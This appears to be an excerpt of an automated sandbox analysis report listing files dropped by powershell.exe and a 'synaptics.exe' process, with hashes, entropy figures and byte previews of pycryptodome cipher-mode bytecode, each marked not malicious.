                                                                                                                                                                                                            SHA-256:425941BD23587B75F0478E8BD93729CFEC5B1DC7308AA3DE413FF3FC9CFB48D9
                                                                                                                                                                                                            SHA-512:FAF542D8FC30967F7EE821D6092CA47BB5A2ABA3C3763D2B6808328D32B2CEB4119DC7460D9AC30F0303A298615636D2C085BF2A4671227EB1B2CAAF57E13DEF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gk........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.e.e.e.d...Z.e.e.e.e.d...Z.d.d...Z.d.S.)......N)..._create_ecb_cipher)..._create_cbc_cipher)..._create_cfb_cipher)..._create_ofb_cipher)..._create_ctr_cipher)..._create_openpgp_cipher)..._create_ccm_cipher)..._create_eax_cipher)..._create_siv_cipher)..._create_gcm_cipher)..._create_ocb_cipher)....................................).....................c....................O...s....|.|.d.<.t.t...}.|...d.d...r.|...t.....|.|.v.r.t.d.....|.r^|.d.v.r2t.|...d.k.r+t.d.....|.d...|.d.<.n,|.d.v.rGt.|...d.k.r@t.d.....|.d...|.d.<.n.|.d.k.rVt.|...d.k.rUt.d.....n.|.d.k.r^t.d.....|.|...|.f.i.|.....S.).N..keyZ.add_aes_modesFz.Mode not supported).r....r....r....r....r....r....z Too many arguments for this moder......nonce).r....r....r....r....Z.IVr....z%IV is not meaningful for the ECB mode)...dict.._modes..pop..up
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7505
                                                                                                                                                                                                            Entropy (8bit):5.149284207361379
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:rY6kvwbQ9XIHJEgsA4nx3ZzhSN975esIDGnt834mGvWcsQNEc1Pk8HvGBt83425z:rbJHrt4x3ZYB8smGtU4nOMGnU4x3LVe5
                                                                                                                                                                                                            MD5:320BC5AA034A0FEF50728CEA528BC1FE
                                                                                                                                                                                                            SHA1:BF10B2490EF002E4C9934E1B1232F9A3B7642B26
                                                                                                                                                                                                            SHA-256:D420F4F2D17EF12924A9D9B823444EF0E3C299D8CF1C73F7F81E8D5687FACE31
                                                                                                                                                                                                            SHA-512:7C07FE306CBD6B78A903752D16B8C5C1393FE14F0353A8275EE2BC1F919CF5C36789305DD2F544B06B29EF63A58519342F5364D1E965E69D49BD6DB54D17967E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7479
                                                                                                                                                                                                            Entropy (8bit):5.150278146171232
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:2Y6kvwbQ9XIHJEgsA4nx3ZzhSpR5esIDGnt834mGvWcsQNqC/Y8HvGBt83425phX:UbJHrt4x3Zq8smGtU4w1MGnU44Kt0qOp
                                                                                                                                                                                                            MD5:B40D84315BB2A3BEBB7B27176F113117
                                                                                                                                                                                                            SHA1:57C5261582F761F86386C555381FE41E3CF478B6
                                                                                                                                                                                                            SHA-256:8DA713951F3D223FB4231369F9027224A5CA94EEE6FB7BE25775836AA0DA345A
                                                                                                                                                                                                            SHA-512:10ECC97D45769C5014BA03D3563BD53E75C0F8111AC4AF4C7A547938394960F9091FD1922F955D9DE3F91B9C7752C786484FD45D6DD71C2125C7A9B2BDD727A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17980
                                                                                                                                                                                                            Entropy (8bit):5.289936257563215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:qR1q/qgUMg1AMH1I4nnu5C8FzCyhlG7MiyqS:qL31P6X7h87ZyD
                                                                                                                                                                                                            MD5:192FBEFBBC6ECDD9DAC1FE58A0F36B4D
                                                                                                                                                                                                            SHA1:0DF0F45DC4F466F3527747F3AF3D16393433F142
                                                                                                                                                                                                            SHA-256:A422F2595F54A2789151B1CD670D2AF02232F205FD18670385B2AF41574A9AB7
                                                                                                                                                                                                            SHA-512:9E30FCE1DDEDFB9FA087F2063704CDBA8ECDB586E557312DF7ECF0DAB1CED2AB5D7DD468089CF938F3182A36D4AEF8E69BFFF4A239CBC5D8C36147D71D17D1DF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.a.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.e.d.d.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc....................K...s....t.d.d.|...S.).N..Enum..)...type)...enumsr....r.....nC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\Crypto/Cipher/_mode_ccm.py..enum3...s......r..............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d!d.d...Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d!d.d...Z.d!d.d...Z.d.S.)"r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and aut
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17954
                                                                                                                                                                                                            Entropy (8bit):5.290212994595442
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:tLq/qgUMlQiMS1I48juzC8Y2tMlx7vXyqE:tLSQM6jQMb7/yV
                                                                                                                                                                                                            MD5:3FE27BC51CA0C19625F77129502E38D3
                                                                                                                                                                                                            SHA1:895EFC83C1D313DBAB12F9E73E6F756AA1E17D93
                                                                                                                                                                                                            SHA-256:6D6FBB648A5DF441133D6D889F2E0F8A7A71F87657F1239A3FD8C3C4B4CDDB6A
                                                                                                                                                                                                            SHA-512:A8B4AF40F79372ED5866F348D04F74A2AC7F348E3114CE37A8944E67D1DE112C75516A226D8C01767DB74224A2CF599E688D55F6805ACEA46EA57E8560F35C30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.a.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.e.d.d.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc....................K...s....t.d.d.|...S.).N..Enum..)...type).Z.enumsr....r.....TC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Cipher\_mode_ccm.py..enum3...s......r..............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d!d.d...Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d!d.d...Z.d!d.d...Z.d.S.)"r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17954
                                                                                                                                                                                                            Entropy (8bit):5.290212994595442
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:tLq/qgUMlQiMS1I48juzC8Y2tMlx7vXyqE:tLSQM6jQMb7/yV
                                                                                                                                                                                                            MD5:3FE27BC51CA0C19625F77129502E38D3
                                                                                                                                                                                                            SHA1:895EFC83C1D313DBAB12F9E73E6F756AA1E17D93
                                                                                                                                                                                                            SHA-256:6D6FBB648A5DF441133D6D889F2E0F8A7A71F87657F1239A3FD8C3C4B4CDDB6A
                                                                                                                                                                                                            SHA-512:A8B4AF40F79372ED5866F348D04F74A2AC7F348E3114CE37A8944E67D1DE112C75516A226D8C01767DB74224A2CF599E688D55F6805ACEA46EA57E8560F35C30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.a.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.e.d.d.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc....................K...s....t.d.d.|...S.).N..Enum..)...type).Z.enumsr....r.....TC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Cipher\_mode_ccm.py..enum3...s......r..............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d!d.d...Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d!d.d...Z.d!d.d...Z.d.S.)"r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7827
                                                                                                                                                                                                            Entropy (8bit):5.113612765462249
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Yo6kvf/G8HDxEpuPnxEZYhjBsCIgGGt834mGPMsQNLcm58H+G0t834U5pYO4cXQE:73xEuxEZ7CJGkU41q5GaU4bz4DbTEA
                                                                                                                                                                                                            MD5:B9E839D5D63CE9C366DBC20148061E77
                                                                                                                                                                                                            SHA1:E8835BB5C0EDB4675FE834953804F64C31790A47
                                                                                                                                                                                                            SHA-256:18C65F91BA2306371BA61346B355F72CA4CC4090F83F46C6007BC6E1D834D847
                                                                                                                                                                                                            SHA-512:A634A456535FFD3B004614887C29DC366822F39B18004D447E8143F48CF0F4C6C789298994D7DC84CF31DED3E79139815A88A4D4C98D673DED732DB45DED242F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decrypt(void *cfbState,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7801
                                                                                                                                                                                                            Entropy (8bit):5.113374464058358
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:No6kvf/G8HDxEpuPnxEZYhB/PsCIgGGt834mGPMsQNPx/g8H+G0t834U5pptYCcX:o3xEuxEZY8CJGkU4ma5GaU4mx4DbKq+E
                                                                                                                                                                                                            MD5:BDE675FDBB284A9EADF0B8ED468C70B4
                                                                                                                                                                                                            SHA1:8BF0ED344E7B805A02BF66E92922067A0D4D4E9A
                                                                                                                                                                                                            SHA-256:1CEA9F0292A196ABAE68A7A26102BAF1BFC1FACF3849A41A813736B4E89677A3
                                                                                                                                                                                                            SHA-512:E5E759A32DC83B92E540B54B643C7D4100485D492B82D086FD8717EDB4980E0C6552F77FD711984FE5F995AA14A6408E9DF117CC83DB0D442F26747E9647A508
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decrypt(void *cfbState,.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11025
                                                                                                                                                                                                            Entropy (8bit):5.101987076529315
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:s7GD6nkH7cxiM16TPy68ssmGrPU4VOGrNU4SlbwSkcjpJxGif:samnGSQJ80MTVOyTScSkmpJxz
                                                                                                                                                                                                            MD5:DD6F4158035207E80111FB07F614EE49
                                                                                                                                                                                                            SHA1:22D1F04E1277C85CDDF455D3E3E5D6BB4B4B4D6E
                                                                                                                                                                                                            SHA-256:39FB3309AFB850FFD891BF3180DD0D1821BC634E29A06CD009E324178E6A5B79
                                                                                                                                                                                                            SHA-512:5496C5F2FFFAF36ECF73B89F10287CEAC38E8B21C0118D9FDD10215812E105A2D0365062BB4E833743F06FB1064F00F01D80E22DD3D0B9794B3F562797BD185E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..gM?.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Crypto.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void *ctrState,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10999
                                                                                                                                                                                                            Entropy (8bit):5.107515729014792
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:77GD6nkH7cxiM16TPyx8ssmGrPU4uOGrNU4XrwSkcji+Gb:7amnGSQe80MTuOyTXMSkmi+0
                                                                                                                                                                                                            MD5:F2C4106517FEA8D3E72ACB0216A05854
                                                                                                                                                                                                            SHA1:D4750D0B7D46066D7BA74B691C4151AE8EEDFBDF
                                                                                                                                                                                                            SHA-256:93325AFE4B60A81A2B8178570119919C1197A4B674C20D8DB659484C69AA5322
                                                                                                                                                                                                            SHA-512:024843F24D1CFFFD696D408D8EBE9072439BBD87C2410D68D2E11C517F9343CD1945276F3BBAD865EA39F95F10D4065F0B68B9680B88AC681DACF109D10FAB48
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gM?.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Crypto.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void *ctrState,.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12311
                                                                                                                                                                                                            Entropy (8bit):5.164983352200741
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:rsVawXqNRGp1vCM4PBrU4/ZDwU4Q3Rz/AfBRWDL/77lLerhp3xWmgP:8awXq/E4M4lTVwTQp/AreLT7luD0/P
                                                                                                                                                                                                            MD5:CBE5867621063A7331967DB2B9951A50
                                                                                                                                                                                                            SHA1:92024BE915E100C69D2B62523AF4685B24F6F413
                                                                                                                                                                                                            SHA-256:B9F1EB921B0585366C44222B751913A5EC39067BA97B331A9B78BE0A7D188046
                                                                                                                                                                                                            SHA-512:8D23B9BCCFDCA5A9142A40439D742EE7C092F1FC10BE02BCB9AF0E14DFB1EB922A2E3216832D78D75336E73D50A8CE4DEF4F9A65F33F98818683488FB1B59AD4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.:.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc....................@...sh...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12285
                                                                                                                                                                                                            Entropy (8bit):5.164330386138498
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:WsVawXqNRGW1vCM4PBrU4/4DwU4X3Rz/AfrRWDL/773uewFjp3xWmk1:DawXq/L4M4lTwwTXp/AVeLT732L071
                                                                                                                                                                                                            MD5:BCC4007F60C216415D4C1925DA76BF3E
                                                                                                                                                                                                            SHA1:6CE4EA0AC20873ECAF571BBD443B1BD3A62CA239
                                                                                                                                                                                                            SHA-256:8B9A465ABD09E1D905D21778DA533E638989CFE44F0AFFA0BACD8B24D38C646F
                                                                                                                                                                                                            SHA-512:2B7B1A2799ACAEB363CEFC9F84FD7DF01067C67A680D068849421274954E20CC12608BF2B6BEBECD311CFDD695FB87F8682495EBA6BB5E28881C08F880B5EE74
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.:.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc....................@...sh...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5854
                                                                                                                                                                                                            Entropy (8bit):5.108433717039551
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SFv6kvV9AtXEHlhfKx7lhL6LeaqBP6sQLRdJ98HJm3qc5pHIeOD:SH9pHlhM7CekL96mxsD
                                                                                                                                                                                                            MD5:6A8FA023F61ED3B3E2B9E015485D3D12
                                                                                                                                                                                                            SHA1:30365A4A789604677CA8255BD62CD4DA910B0203
                                                                                                                                                                                                            SHA-256:9379E20F4BCF4F3239D3F1EAD7A93D2F12CDD0D3786CD1A5F8D52CAB17D597BA
                                                                                                                                                                                                            SHA-512:D4C9B8A5F7BD64F97A20DFD52F3AA44DCEBF29E658A780209554BBBB6D8EE3E565AF6636476A766210F1A47767CF782ABCD5C275C2F5E4270F1CB7C629425B2C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..gQ!.......................@...sX...d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Crypto.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c....................@...s,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5828
                                                                                                                                                                                                            Entropy (8bit):5.1075576042761845
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ikFv6kvV9AtXEHlhfKx7lhL9FeaqBP6sQLRdJ98HJm3qc5pHIeOD:ikH9pHlhM7vekL96mxsD
                                                                                                                                                                                                            MD5:FDEA3B550CC0E2D5A6569E85641C0553
                                                                                                                                                                                                            SHA1:FE1A41A7905530CA89A908E6AD11945C14655D5D
                                                                                                                                                                                                            SHA-256:18782E2A21671BEB01E4A9A401BA5CE9B77FD22580E4204B494B4BF7B849EF16
                                                                                                                                                                                                            SHA-512:E689977525A31E125E493CE109B9D4C3DE8BD28268FD52BF81BADCC85DFB3027B14EEE188BB1168EA702FBB555ECEC8256F9E64FA2198C148EAB1BBDBD660329
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gQ!.......................@...sX...d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Crypto.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c....................@...s,.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17108
                                                                                                                                                                                                            Entropy (8bit):5.332004640900434
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Rk+RW9s5cqbahPM40ZnBaTnTg3i7HSv7O9f+:R3w9sGch47ya9W
                                                                                                                                                                                                            MD5:12E40163A5AA2B670BF8AA649256E59E
                                                                                                                                                                                                            SHA1:9135D6C3680CBC56D0250E22BF5D39A352BD4CAD
                                                                                                                                                                                                            SHA-256:D29E87BFB99A4F6DC51BD4F97ACF473180F2FF5E5649B97BDEA1CBE4969B5B18
                                                                                                                                                                                                            SHA-512:4F9C85AE52E490171B98DE597FB6347B2330244054B598ECA90F0E1419B1BBF0119CF063E9953EBE3A25BCFC66B574F38FD357A42376D3BD9ED858DC6F057B24
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
